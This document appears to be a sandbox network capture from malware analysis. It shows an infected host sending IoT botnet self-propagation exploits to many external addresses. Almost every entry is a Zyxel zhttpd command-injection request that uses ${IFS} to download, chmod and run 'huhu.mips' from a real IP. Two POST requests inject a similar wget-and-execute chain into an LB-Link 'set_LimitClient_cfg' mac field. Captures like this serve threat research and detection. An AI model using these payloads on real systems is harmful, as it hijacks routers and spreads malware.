                                                  Jan 19, 2024 18:24:10.352921009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8036192.168.2.134853424.61.167.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.352972984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8037192.168.2.134982842.233.170.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353015900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8038192.168.2.1342830163.193.138.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353055954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8039192.168.2.1351442161.38.235.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353122950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8040192.168.2.1344094174.213.43.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353138924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8041192.168.2.1335812111.167.51.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353180885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8042192.168.2.1347204153.161.62.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353214979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8043192.168.2.134225889.216.47.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353265047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8044192.168.2.1345356191.46.11.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353298903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8045192.168.2.1335636195.37.193.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353342056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8046192.168.2.1335152150.105.4.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353379011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8047192.168.2.134866631.58.250.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353423119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8048192.168.2.1343330200.108.162.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353450060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8049192.168.2.133364892.159.242.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353506088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8050192.168.2.1352606198.142.102.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353550911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8051192.168.2.1340026105.104.60.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353590965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8052192.168.2.1352736187.166.89.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353645086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8053192.168.2.1342894169.170.143.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353693008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8054192.168.2.134835896.135.201.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353732109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8055192.168.2.1348042187.60.59.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353777885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8056192.168.2.1336220187.22.165.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353807926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8057192.168.2.1334800196.97.110.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353835106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8058192.168.2.135425063.163.155.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353900909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8059192.168.2.1346220217.252.14.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353930950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8060192.168.2.1333208166.169.59.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.353969097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8061192.168.2.135306246.201.127.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.354028940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8062192.168.2.135753262.246.71.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.354048014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8063192.168.2.133548682.52.55.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.354094028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8064192.168.2.1355988211.200.74.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.357296944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8065192.168.2.1352992189.85.90.738080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.436588049 CET634INHTTP/1.1 400 Bad Request
                                                  Server: micro_httpd
                                                  Cache-Control: no-cache
                                                  Date: Tue, 13 Jan 1970 19:50:50 GMT
                                                  Content-Type: text/html
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 70 72 6f 78 79 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 70 72 6f 78 79 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                  Data Ascii: <html><head><META HTTP-EQUIV="pragma" CONTENT="private, no-cache, no-store, proxy-revalidate, no-transform"><META HTTP-EQUIV="Cache-Control" CONTENT="private, no-cache, no-store, proxy-revalidate, no-transform"><META HTTP-EQUIV="expires" CONTENT="-1"><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8066192.168.2.1358896103.147.141.698080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.502399921 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8067192.168.2.1348202107.178.178.2538080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.978183985 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8068192.168.2.1356388191.197.79.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.349895954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8069192.168.2.134044048.212.80.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.349958897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8070192.168.2.135927645.76.192.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350104094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8071192.168.2.1348602200.7.160.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350137949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8072192.168.2.1349966185.205.164.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350172997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8073192.168.2.136014284.188.26.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350220919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8074192.168.2.1346518169.146.5.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350264072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8075192.168.2.1333348176.219.246.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350296974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8076192.168.2.1360112146.149.100.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350332022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8077192.168.2.1358540152.44.56.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350370884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8078192.168.2.1333762190.95.52.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350414038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8079192.168.2.1334606149.78.186.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350472927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8080192.168.2.135004047.9.145.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350547075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8081192.168.2.1346882165.62.180.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350577116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8082192.168.2.133874214.140.247.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350584984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8083192.168.2.1354824110.198.255.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350614071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8084192.168.2.134544236.197.20.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350689888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8085192.168.2.135762020.145.12.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350708961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8086192.168.2.1357742103.229.127.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350718021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8087192.168.2.1345700106.22.178.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350773096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8088192.168.2.1338454206.255.193.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350810051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8089192.168.2.1357938122.167.73.34443
                                                  TimestampBytes transferredDirectionData
